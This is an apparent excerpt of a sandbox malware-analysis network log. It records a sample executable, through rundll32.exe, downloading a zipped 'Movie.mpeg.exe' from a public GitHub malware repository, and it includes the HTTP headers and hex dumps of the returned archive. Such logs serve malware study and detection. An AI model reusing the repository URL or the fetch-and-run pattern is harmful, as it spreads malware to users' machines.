                                                                                                                                                    2022-09-29 12:59:12 UTC17163INData Raw: 2c 2a f1 f6 9a 46 fd c6 33 12 ec c1 78 21 df f5 0a d6 6b 5f 44 92 c1 53 9c 18 f1 93 ab 5b 34 bd de a8 8a 00 bc d7 97 b5 55 71 2b 2b 04 f2 b4 9c 60 ad db c1 2d c5 b2 20 40 c9 9d 7f 7f a9 e2 78 5d 1a 47 0e 82 f2 96 58 e6 79 99 19 91 b5 b5 f1 3c c0 c1 ed 06 85 b5 39 39 20 1c ff 0a 02 57 94 3c 7b b5 0c 75 db 5e 8c 0d 67 5a 9a 9f 54 cd 75 88 52 f1 04 68 e4 87 f5 8f 4a 2b 18 21 d0 0a d9 dd 64 41 b3 aa 36 18 3a 94 32 6e 8f 9d 73 4e b8 77 b8 92 41 b8 0a bc 5c 62 60 4a 04 b7 6e 47 5e fe a8 20 e2 35 63 47 3f c6 20 5c 31 4d 53 4b e5 6f 2f 2f 15 ad c4 7d 02 e4 55 db 16 4a a1 fc 39 13 67 f5 eb 66 40 01 20 72 7f 16 82 b3 9b d5 c6 c7 31 18 c8 a1 3b dc 17 4d 2c 89 de 92 a6 79 90 8d a1 7b 7e c1 b4 4e 95 26 96 ed 10 a1 72 94 50 ed 67 87 2a 75 93 de d7 71 32 73 32 88 46 a9
                                                                                                                                                    Data Ascii: ,*F3x!k_DS[4Uq++`- @x]GXy<99 W<{u^gZTuRhJ+!dA6:2nsNwA\b`JnG^ 5cG? \1MSKo//}UJ9gf@ r1;M,y{~N&rPg*uq2s2F
                                                                                                                                                    2022-09-29 12:59:12 UTC17179INData Raw: c1 62 96 44 95 1c a7 cf 8b 70 82 d5 0a 64 dd 22 10 67 b7 fe 5d 3c 10 1e bc 67 13 50 39 37 09 89 1b 85 27 29 f9 2e f2 1d f1 61 dd fb dc d3 cb dd fc 2d 26 e3 e7 61 96 d5 d4 d3 d0 ee 67 61 22 61 69 1d f3 e8 55 83 a8 81 6d 35 a5 16 13 d6 97 e3 03 13 30 56 e4 58 0d d1 d1 fd 13 2e c6 d8 00 06 d0 33 ca ff 1f cc a5 b6 ba 5e 68 75 fe e7 03 c9 c8 9c d2 40 31 2c 57 c9 90 fe 30 e9 1d ba 38 23 24 94 3b 26 95 6d 66 28 61 a3 7f 26 5e 47 1a ef 64 50 3d c8 88 71 11 0b 70 01 23 01 e5 68 3e 99 b6 6b eb d2 af b6 74 6f 7e f1 f7 53 6b cd a2 4e 6e 05 47 07 55 ad 88 5a b8 bf 59 0b ea 69 7b e6 51 84 62 14 46 8c 90 1d d4 0c 5a a4 79 66 ef 5f 05 2e be e4 84 7a d2 6b 8a 7a b7 ac 6d 2c b7 05 cf a0 a2 4b 9d 11 c1 82 7e 99 62 68 c3 10 34 8a dd 68 5e f3 8c c1 99 80 74 fd b6 39 b4 de 09
                                                                                                                                                    Data Ascii: bDpd"g]<gP97').a-&aga"aiUm50VX.3^hu@1,W08#$;&mf(a&^GdP=qp#h>kto~SkNnGUZYi{QbFZyf_.zkzm,K~bh4h^t9
                                                                                                                                                    2022-09-29 12:59:12 UTC17195INData Raw: 05 5d 3a d1 34 7b 40 e1 24 18 b0 5e 53 ba 8a ba c5 b7 2d dc 64 39 bc 35 86 78 a4 3b bf 87 0c 00 3f 93 6e fc 00 f1 95 4c 9a d2 c9 9c 0c f6 e1 bf a7 6d 66 9a 5b 9d 07 2e c9 14 b0 73 43 35 25 50 06 d1 5c 50 a5 22 08 a4 39 f8 e3 4b f2 4f 8d 31 f3 33 70 b9 39 47 4f 0c 82 09 8b fc c9 40 4f 9e 28 33 5d f9 74 eb 4b 3a 79 16 06 80 79 43 c5 3f 2b ab 99 0b 60 93 1c 82 31 bc 99 2a 77 8e 37 61 3a 52 16 67 11 7d 8e f2 8b 98 84 c0 ff 14 d5 d1 7e b0 ab 29 67 8e 6b b7 14 f7 6e 33 af 2f 53 29 5d 93 fc 7c c8 bf 06 17 fe e5 2a 8a d4 1b 58 ad e9 51 95 fb 69 a3 41 e2 ae 02 da 3b 97 25 50 80 8f 9f e1 df a6 6d b9 5d e6 34 47 23 f1 88 54 eb 12 14 31 f5 b1 77 c0 44 56 6e 33 7e d1 83 75 f3 be 7e 19 1e 14 db 05 fa 56 86 3b 11 a4 ed ad c2 08 d0 50 f1 40 81 51 ed 82 de 86 1f 29 bb 21
                                                                                                                                                    Data Ascii: ]:4{@$^S-d95x;?nLmf[.sC5%P\P"9KO13p9GO@O(3]tK:yyC?+`1*w7a:Rg}~)gkn3/S)]|*XQiA;%Pm]4G#T1wDVn3~u~V;P@Q)!
                                                                                                                                                    2022-09-29 12:59:12 UTC17211INData Raw: 23 13 93 0b 28 01 4b 4e 1f 42 c4 03 77 0e 90 04 2f b4 32 74 b3 b0 37 9b 68 6f d0 ca c2 2f 8e fc c0 4e b6 70 8a 33 f2 d7 b2 73 c3 e2 0e 94 d1 6c 68 6e 5c c9 26 79 07 09 16 d8 c7 96 95 39 e7 c0 8f fc d8 86 b1 1e c6 a7 e8 1f 91 78 15 23 5a 50 31 f7 b6 ed e9 60 74 75 ff 5e 6d 38 62 b6 29 04 f6 e9 f2 6e 4a 40 f4 61 c1 20 8f d5 eb 28 20 f4 b8 51 48 73 c0 13 ce fb a6 4e a1 87 8b 65 89 8a ca b8 8d a4 d3 8e b2 71 bd dd 5d a0 24 36 03 f2 c0 29 77 8e 7f 81 15 57 ea bb 6d de e5 2e 02 13 7b 7a 29 ff ab 7b cf a1 e0 85 49 32 60 05 da 64 a9 15 ae 55 11 ae 5e b6 9a d1 01 5e 54 ec c4 d2 44 4a b0 79 ba 2a ac 0f 24 25 02 de f0 18 c8 13 89 fa de 64 9c 71 96 a6 a9 56 fa bc 8e 74 d5 43 63 4f 80 01 fd f2 20 7a d3 e1 49 f0 38 be 2e 78 a9 24 7d 45 bd 10 b3 c8 90 6d 76 3b 10 02 ae
                                                                                                                                                    Data Ascii: #(KNBw/2t7ho/Np3slhn\&y9x#ZP1`tu^m8b)nJ@a ( QHsNeq]$6)wWm.{z){I2`dU^^TDJy*$%dqVtCcO zI8.x$}Emv;


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    93192.168.2.349754140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:12 UTC17225OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    94140.82.121.3443192.168.2.349754C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:12 UTC17225INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:12 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:12 UTC17225INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    95192.168.2.349755185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:12 UTC17227OUTGET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    96185.199.108.133443192.168.2.349755C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:13 UTC17227INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 384539
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "0cab7a1b89e2af64986c2b84b88ccd44dcd6860b69b6ea218a864980f0359863"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0815:F707:9B622:135946:63359359
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:13 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6947-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456353.848893,VS0,VE166
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: f20e3dad5d6f851dae57c0ebcc6bae8e94a00d0c
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:13 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:13 UTC17228INData Raw: 50 4b 03 04 33 00 01 00 63 00 c2 8c 4c 40 00 00 00 00 4d dd 05 00 00 7a 06 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4d 6f 76 69 65 2e 6d 70 65 67 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b6 8a 92 ee e8 62 ae fc e2 00 b1 2f 88 04 96 0a cc 4a 58 55 d5 86 04 2e e4 47 87 5d 38 0b 11 59 f2 ce 8f 3a b7 b8 de 3b c7 bb 1d 5d 19 64 c4 2a 7f d4 a2 f9 a6 98 b6 77 c9 81 c4 bc 63 64 a4 d4 36 39 45 fe 48 3b fa db 60 4c bc d2 c1 2c 9f c0 42 d1 88 ec f9 c7 0a ea 26 58 0d c4 06 ed 19 df 9e 04 73 b6 4b cf 54 95 95 dc cf 08 f9 f0 43 5f 26 e3 16 63 86 25 ec 9e 30 e5 5f 60 1c ec 61 1f cd 23 84 b7 af b8 60 b2 08 37 3a 9a 56 6d 06 6b 26 36 e9 ee 7c 24 c2 aa 51 32 53 43 61 68 5c 72 d5 5f 05 a8 01 5e 4c 0d 24 38 72 86 3a ba 72 a0 21 b5 c9 cf 1b ea 8b ed a1 67 90 6c 5d
                                                                                                                                                    Data Ascii: PK3cL@MzEndermanch@Movie.mpeg.exeAEb/JXU.G]8Y:;]d*wcd69EH;`L,B&XsKTC_&c%0_`a#`7:Vmk&6|$Q2SCah\r_^L$8r:r!gl]
                                                                                                                                                    2022-09-29 12:59:13 UTC17229INData Raw: 1c 68 f5 2f 1b 36 7c 6d 78 d5 52 fa 63 c2 b7 8e 28 79 4a 2c c2 e2 6b ce 4b a7 03 86 08 3c 35 1b 02 fc a1 39 87 66 69 f5 67 43 c0 99 d4 3d 94 d3 13 f9 09 f1 48 98 fa 92 3f 8c 6d 8c c1 df fc a1 73 12 2f ab 87 ce e1 e1 3b 85 90 ed f5 ed 67 67 7c e5 52 eb 9b f3 3c a9 64 df 91 ff bb 94 bc 59 28 0a 70 42 b2 26 90 9f c0 5a b4 64 7d 20 ee 38 9e c5 07 ba 8b 1a 87 7c 8f 5a a1 47 0e 6d 9b 2d 14 6d f8 67 d3 c5 0a 35 bf 55 59 c5 2b 07 31 c5 3b 78 e8 54 31 cd 4c fa dd 1d a3 fe ce 30 94 6c 5e b9 50 47 e6 dd 05 8d c6 8c 79 4c 01 7a e7 c5 91 e7 cf 97 12 5b 22 b9 83 42 98 4e e1 07 55 c7 e0 43 9e 1d c6 3d b9 f6 ef 58 39 c3 3f bc 5a 7d 28 f9 25 01 97 a8 fa fc 2f 22 3d ae e6 e2 fc db 71 47 db f6 9c e9 2d a8 2e 4c ff 9a 84 23 ef d4 47 4b 7d 31 41 6e f0 c0 58 d3 71 d1 e0 a1 51
                                                                                                                                                    Data Ascii: h/6|mxRc(yJ,kK<59figC=H?ms/;gg|R<dY(pB&Zd} 8|ZGm-mg5UY+1;xT1L0l^PGyLz["BNUC=X9?Z}(%/"=qG-.L#GK}1AnXqQ
                                                                                                                                                    2022-09-29 12:59:13 UTC17231INData Raw: 6d 45 dd 12 be 32 41 85 b5 70 10 12 5d 68 8e 19 d8 c6 ec 16 ea 75 6c 5b 3a 7e 2f c0 40 53 31 1f 39 76 51 59 13 74 66 24 73 7a 06 97 8b 83 25 97 02 8f 66 6c 39 ee c1 c1 de 2d 36 c6 20 65 1c bc 3a 4f 54 23 6e 3d 0e b7 c0 98 bb e7 85 c8 46 62 df 4f 20 c3 3e 3e f5 25 d6 1d 87 db 7b 4f 1b 87 b0 ae c1 f8 28 e1 25 36 69 95 5b 89 ac 2e 4f a4 98 c7 83 d2 36 3e 7b a8 58 ce f9 9e 76 b9 9f 55 f7 13 01 ff 8a fa ee 28 df 5a 7c bb 3f 79 b4 3d cc 52 0b e7 2a 2d f2 a4 40 6a 05 8b d5 cf f3 47 11 50 a3 9a 57 c9 80 76 43 d0 05 26 ce 5c 2a 01 6e 2d cd 5e 1f 0f e5 71 63 90 12 b7 e3 2e c5 98 9f fd fc 36 ee 2f 35 8c 6c 59 58 80 2b 48 1e 95 1a 53 5b 72 0e 45 73 c3 1e ad 35 b9 60 8d fb 25 8d e6 52 e3 fa d9 02 f8 61 dd 6d 39 c3 39 a4 2a 74 43 1a dc 96 ac 40 54 f9 4b ef 48 2f 2c 87
                                                                                                                                                    Data Ascii: mE2Ap]hul[:~/@S19vQYtf$sz%fl9-6 e:OT#n=FbO >>%{O(%6i[.O6>{XvU(Z|?y=R*-@jGPWvC&\*n-^qc.6/5lYX+HS[rEs5`%Ram99*tC@TKH/,
                                                                                                                                                    2022-09-29 12:59:13 UTC17232INData Raw: c5 fc 2c ca b4 3f c0 68 5f 7a 20 a9 91 c4 b0 8c ba 28 45 55 c6 7c 0c cb 00 52 3b a0 66 03 78 ed ae d8 56 75 82 77 6d 3f d6 29 2a 3e 23 c6 a2 d2 13 66 d8 61 fa 98 27 5f 59 71 b4 fc 0b f3 0e a2 b7 ef cc 04 85 26 cc ff 86 a2 d2 8a 36 a8 97 34 2a a2 16 ab c5 be 61 09 1c 40 9b 5d 57 5b 2d 26 12 eb c5 7b 02 ec 51 db eb d8 45 de 86 2b 06 b5 e7 af 24 6d e0 70 45 83 16 67 37 2a 01 c2 55 f0 dc a1 f8 5f 7d 2c 6c 21 2c d9 89 35 88 72 72 5e 98 da 0d 9b dc 87 6e 02 2f 63 00 2a 0e 52 77 83 cf e5 3e a5 43 26 92 28 9d 51 66 3c 0b ab 5c bb 57 06 89 34 81 aa bf 28 b4 7f 76 48 e9 25 a1 47 43 5b fa 68 7a 43 a0 72 68 2b ec 6f c9 f6 9f ae 0b 0e 86 1b 8d 39 ed 57 9a 65 6c e4 17 64 91 6f 0c d6 89 38 64 f0 ec 65 cb 1f cb e6 53 7c 07 70 69 96 31 a7 73 f7 6c d6 54 6b e2 eb 38 41 5f
                                                                                                                                                    Data Ascii: ,?h_z (EU|R;fxVuwm?)*>#fa'_Yq&64*a@]W[-&{QE+$mpEg7*U_},l!,5rr^n/c*Rw>C&(Qf<\W4(vH%GC[hzCrh+o9Weldo8deS|pi1slTk8A_
                                                                                                                                                    2022-09-29 12:59:13 UTC17233INData Raw: 9d f9 a8 bb 6b 2f 03 8a 0c 91 4d be bd 3c 6b 1f dd 15 0b 7c 13 aa f4 10 9c 51 a4 35 02 eb 76 27 10 e1 bd 17 3b 6d 69 64 27 e7 30 4c 01 9f e0 01 85 46 06 c3 2a 50 38 27 d4 9d d5 ea 9b 5e 66 38 dc e4 ec 78 9f 89 c0 9b 07 32 66 6e 9f 60 1a 67 08 69 e3 f6 7f 0d 02 0e 83 11 93 1d f4 82 78 94 87 45 d3 bf 80 57 19 a2 9b f9 8b 28 4f 67 31 a3 a4 6a 75 b8 66 eb eb 6b f3 22 6e 62 c1 e8 00 04 79 b4 6e 8c b1 e0 0a 89 f8 22 16 1c 31 8b 0b 43 95 a3 21 22 bc 98 50 50 bb 4f b0 c8 ce 65 77 7a 19 e6 93 0c 52 ea 41 4f 0c 7a a2 8a 0a d7 7c 05 d8 a5 8d bc 77 ce de d2 c3 fb b9 c4 f2 c9 2c 00 47 a0 37 37 bd 71 97 16 5b 65 d4 8b e5 e3 7c 82 50 c3 a5 86 31 35 15 a1 d8 6e ad 71 34 3d be f1 4e b5 0d b7 7b 5d f4 9d cf 2d 3c 9f 4c 0c 0c bd 75 35 6b 27 9f 82 35 2b 06 15 42 d2 5e ea 75
                                                                                                                                                    Data Ascii: k/M<k|Q5v';mid'0LF*P8'^f8x2fn`gixEW(Og1jufk"nbyn"1C!"PPOewzRAOz|w,G77q[e|P15nq4=N{]-<Lu5k'5+B^u
                                                                                                                                                    2022-09-29 12:59:13 UTC17235INData Raw: 30 3d 66 fb 2d eb 4f 87 80 69 ca 12 32 5e 3f ca 11 8c 65 bc 25 9c 90 fe 4b a5 c8 e3 b8 98 11 b0 69 88 20 bb 8a 94 e3 74 f7 e4 09 f1 ee b7 96 3d 1a d4 3e d9 4d 75 40 ae 37 f5 45 1c d5 c5 f4 a1 38 aa 9f 92 2c b8 9d fe f4 8e 1c 66 3b 66 e4 2b f6 0b dd a9 9a da a8 40 77 52 0d cd b8 b7 52 9b cb 7a 92 3b 3d 78 1a 36 06 5c cc 41 27 49 6c 59 66 3f be b9 1d 99 09 36 43 71 c4 aa 71 a3 22 34 40 50 22 08 3a 41 67 e0 42 72 4e 78 65 89 6a c6 76 db e0 8d 32 00 c1 2f db 7f a3 4d 34 73 8e d0 cd 0b 75 04 88 54 91 33 4f b7 ca 03 33 2d f7 1e db 3a df 22 7e 85 17 a0 41 88 01 5f 5e 67 86 ae 15 43 d1 4a 6b 27 71 3b 39 f2 9e 05 1a ff e8 0b 48 c5 3d 3a e9 6e 59 89 4e e6 05 3b a5 48 2f 61 6b fc 4c 9a 41 d1 1a ed ae 1e c1 b3 ef e9 38 09 e5 4e ca 20 9e 78 12 b9 1a 0e 19 71 78 4c 42
                                                                                                                                                    Data Ascii: 0=f-Oi2^?e%Ki t=>Mu@7E8,f;f+@wRRz;=x6\A'IlYf?6Cqq"4@P":AgBrNxejv2/M4suT3O3-:"~A_^gCJk'q;9H=:nYN;H/akLA8N xqxLB
                                                                                                                                                    2022-09-29 12:59:13 UTC17236INData Raw: a8 de 6e f2 96 d5 c7 17 0a 0a 8a f6 2b b0 7a f2 81 b9 f3 11 40 d7 1d 88 aa 45 e2 a0 63 8f 7c 8c 7a 68 76 e5 bb bc e4 4f e7 2b 8e 05 a8 08 05 1a 5e af 54 c9 88 bd 78 69 bb df 31 f0 41 4f ec 41 6c d7 bd 25 fe 1a f8 e1 96 df 9c f9 ac f3 b3 a1 0e 7d f3 d9 6a 73 9a b6 f3 82 3d 8f 94 67 d1 56 1d a9 dc 29 1f 64 bc 97 4d 6d 06 85 d3 e3 f4 be 76 5c 11 75 1a f8 c7 a4 15 54 11 b5 25 4a 7b e8 cc 66 f5 7f 97 b0 a1 3f 88 b2 72 4c ec b1 04 98 13 4c 36 b3 2d 3b cc d3 f4 14 4d 17 97 36 4f fb d8 7b 25 52 bf bb 05 d8 a9 18 68 4d 78 c1 d7 d2 b7 10 b4 76 1a 21 c3 fd 2b 9f 48 db 13 f6 a5 b6 48 34 a3 9e b7 ee a2 50 31 54 47 3b 86 c8 d7 c0 f2 0b 3a 82 2a e3 c1 6b a9 ef bd 9a 8f a2 70 db b5 e9 2c 21 34 e5 14 65 5f 2f ab 5c 1f 7f 8e 5f 85 4c 5e 2a c9 be 78 75 31 db 30 23 1e 68 69
                                                                                                                                                    Data Ascii: n+z@Ec|zhvO+^Txi1AOAl%}js=gV)dMmv\uT%J{f?rLL6-;M6O{%RhMxv!+HH4P1TG;:*kp,!4e_/\_L^*xu10#hi
                                                                                                                                                    2022-09-29 12:59:13 UTC17237INData Raw: 15 06 60 ef f5 03 b3 ae d6 70 a3 2c eb ae 2c 63 93 d9 77 3a 37 1a 32 6d 01 68 81 53 aa fd 56 f0 70 a9 b2 e7 20 4e 77 2e 81 e8 de 69 99 4a 36 31 03 25 da a0 68 04 07 65 bf 2d f5 bc d4 f8 3b 81 42 dd cd f6 86 17 98 47 89 cc 09 de f1 23 4b 25 24 d3 65 dc 91 41 5c c9 06 17 a8 a4 ee da 64 4d c7 1f 98 db 51 35 fd be cc da 0d 65 25 03 63 5e 75 ae 89 d3 0d ce d4 52 3f bc 7c 4f 4b 5a 39 52 db a4 f7 c6 69 c8 67 1b d4 2d 6e 20 6a 09 7c 70 46 3b c9 7c 53 26 2f fd 2f bc 22 88 1f e5 2e 7e 2f 1b 41 e4 d5 09 62 86 93 b1 f6 82 b1 ff aa 65 d1 c4 bf 30 d9 b4 d9 c8 47 af 38 a8 2c 48 03 bd f7 dc 13 a5 98 98 8e d7 46 95 6e 3b 2e 71 98 9b a2 47 0c be 75 4f 5b 48 5b f5 68 ae fe 08 53 ef 53 50 0a 50 1f 12 52 21 ed 42 f9 8b 3a 81 37 84 37 94 0b 53 97 31 62 44 6b dd 3f bb 17 51 77
                                                                                                                                                    Data Ascii: `p,,cw:72mhSVp Nw.iJ61%he-;BG#K%$eA\dMQ5e%c^uR?|OKZ9Rig-n j|pF;|S&//".~/Abe0G8,HFn;.qGuO[H[hSSPPR!B:77S1bDk?Qw
                                                                                                                                                    2022-09-29 12:59:13 UTC17239INData Raw: 4f c2 c0 0d 13 0c dc 97 52 2a f5 ba f3 85 3b a1 42 9a 35 85 b5 8b 94 53 12 9d 62 d7 e7 9d 43 50 48 f9 4a 01 11 d7 0c ad 85 9e ef 3f 15 94 7f f2 4d 71 eb 4b 6c fa 8a 67 ba a5 e4 52 7c a9 f2 59 38 82 c1 f4 60 dd 07 d3 97 7f 4d 98 ec 1c ce ad ff 39 8d af 38 84 3c 25 31 01 89 40 c5 35 48 05 e4 16 bd 33 84 57 de 44 fc 38 72 5d c4 5c 38 13 78 a8 64 96 14 d6 a1 c9 06 09 0e e3 e6 7a 8b eb 9c 4f a9 7e ca a1 98 35 06 2a 3c 16 5b 80 3e d9 a0 7a 3a 23 94 ad b2 c9 14 29 c4 b6 83 1d 86 b3 3d 87 6b 26 7b 7f 3c aa e2 41 38 bb 33 b3 d2 13 7a 7d af 61 7d 3f 56 7b 89 06 23 f8 54 f7 92 17 fa 3b 6a 9f 70 29 66 e5 a6 ae 4f 5c 8d 31 b6 dc cc 19 06 54 3b 43 ee a0 d0 80 5d 60 05 f7 3a cf 9e 94 ec d7 84 ec bc ad bc 89 8d 1b 6b bb 95 86 66 89 c3 31 45 fd f9 1a 99 d6 5b dc 05 e5 83
                                                                                                                                                    Data Ascii: OR*;B5SbCPHJ?MqKlgR|Y8`M98<%1@5H3WD8r]\8xdzO~5*<[>z:#)=k&{<A83z}a}?V{#T;jp)fO\1T;C]`:kf1E[
                                                                                                                                                    2022-09-29 12:59:13 UTC17240INData Raw: 42 e7 b6 f2 3b b9 f6 a3 75 fc d0 0a c9 12 25 36 b2 d2 47 86 a0 6f 31 88 a6 19 2d 44 ee ee d6 e2 9a ce 48 08 97 51 73 dc 33 10 8b 3e 51 c1 47 62 f0 7f 2c cb 94 73 70 ce 22 20 cf 85 3e 48 74 02 fb 2e 74 e6 03 2b cb ce 73 06 10 a2 4b b8 e6 20 96 4c 6c 90 b5 35 35 67 12 5b 8a 2a 05 e6 43 d5 e2 16 a7 77 e2 61 3e 6b 4d a4 f7 e8 a7 e6 5e c2 b8 29 20 1c 39 aa f6 9b a5 3c 9e 73 d7 36 3c cf 9d ce ab d0 b9 ca e7 1d 7f 79 c0 b3 fa 1f 41 d7 fa fb 46 86 29 9b a8 2b 61 0b 59 46 7a fa 6f 7b dc 3b c9 93 04 ff 17 c6 bf cc 69 c5 c1 a6 d7 3c 06 a7 8c ee 1e 41 80 fd 91 ff 30 10 dd 07 ea b7 3e 37 d3 96 f8 44 02 bf 2c bc 52 b2 c8 21 1b 9b 11 a4 eb 89 6c ca 65 f5 8b dd 97 63 cd d7 18 f6 a4 18 59 45 9b a3 52 fd 8f f9 92 0d 2e e8 9c b4 18 31 85 ba 96 c5 3f b2 00 f0 ad 55 41 7e 32
                                                                                                                                                    Data Ascii: B;u%6Go1-DHQs3>QGb,sp" >Ht.t+sK Ll55g[*Cwa>kM^) 9<s6<yAF)+aYFzo{;i<A0>7D,R!lecYER.1?UA~2
                                                                                                                                                    2022-09-29 12:59:13 UTC17241INData Raw: 4a 11 42 9a f5 5b 2a 8a 55 a8 16 ab dc 2c 0c a3 e6 a6 5c 58 4f 4e 62 af fa e3 e6 16 03 3a bf a5 2f 0e c8 3a a5 7e 2b a4 d7 5b 3a e4 ba 16 c8 14 e4 ca b8 b6 3a 77 6b 0b 4a 1c 7f c9 65 06 b8 1f ab 39 34 67 5f 88 7d 08 98 76 c3 26 75 08 b2 e2 89 cc e0 92 95 5b fa ec 17 48 22 83 45 65 aa 14 36 1e 58 7b 3b c7 6b 34 44 10 bc df e4 03 40 86 c3 24 be 1c af a2 e6 77 88 b3 23 fa af bf cd d1 1f 43 70 4d 35 21 0a 5e 08 ed cf 30 14 61 75 83 70 64 e5 cf e6 b2 2d a9 aa 42 78 c2 c3 21 2c 9b 1b 52 d1 4f dd a0 d1 7e 88 ae 26 83 5b ba cb c5 d9 73 35 d9 54 ea 57 8d 41 07 52 98 52 00 37 13 36 60 d9 13 2b 02 a8 44 55 d9 52 27 e9 47 fb 25 a6 32 d1 78 3c f8 6c a5 ea fb 92 06 57 cf 46 a1 1f 08 49 7f 7a 65 a3 16 cf 66 40 9f ef d9 07 18 e2 91 66 8f 08 14 57 72 16 47 19 9f d8 48 e6
                                                                                                                                                    Data Ascii: JB[*U,\XONb:/:~+[::wkJe94g_}v&u[H"Ee6X{;k4D@$w#CpM5!^0aupd-Bx!,RO~&[s5TWARR76`+DUR'G%2x<lWFIzef@fWrGH
                                                                                                                                                    2022-09-29 12:59:13 UTC17243INData Raw: 2c 4c 10 09 cd 1e 55 0f 94 40 cb e2 fe 17 4f 2b b1 b6 e4 d5 bc a4 68 36 ea 32 02 02 9f 75 27 c6 b5 94 ed 58 81 14 f4 77 72 7a d2 18 41 c5 ef 97 bf 54 09 83 f9 d2 91 30 aa a1 c7 d4 fb c4 7e ac e9 c3 19 6f 8a 8f 39 57 3a bd ca 30 d2 12 65 ff 56 f3 07 33 85 60 e1 59 61 36 27 36 f5 25 b9 43 9d 3a 44 35 0f a0 a3 d7 f9 78 1e 62 ce 38 46 69 a6 b3 b4 fb 8c 60 74 cf 4d 7a 1f 3c d7 c8 8f b6 0e 71 40 15 95 1d ea ed 76 1c 37 87 b2 26 e8 fc 1d d8 b1 90 c4 03 e5 72 08 f2 e3 f2 75 73 d5 3f 85 4d 75 96 5f cb 86 af c9 c2 04 6c 7b d7 54 a1 6e 1d b4 e1 53 9a 9a 5d d8 ca 74 0b 87 f7 24 9f 02 cf 0a 66 ca 71 f8 ca ef 0d db 47 65 6c 0b 82 4e 41 bb 04 88 29 cb 52 57 5a a4 03 53 8c 9f 11 c2 9c ef 2b 64 93 e7 50 ef d9 d2 0e c9 0f c6 01 44 33 16 79 5e d5 74 b8 b2 ec 9a 27 21 42 fc
                                                                                                                                                    Data Ascii: ,LU@O+h62u'XwrzAT0~o9W:0eV3`Ya6'6%C:D5xb8Fi`tMz<q@v7&rus?Mu_l{TnS]t$fqGelNA)RWZS+dPD3y^t'!B
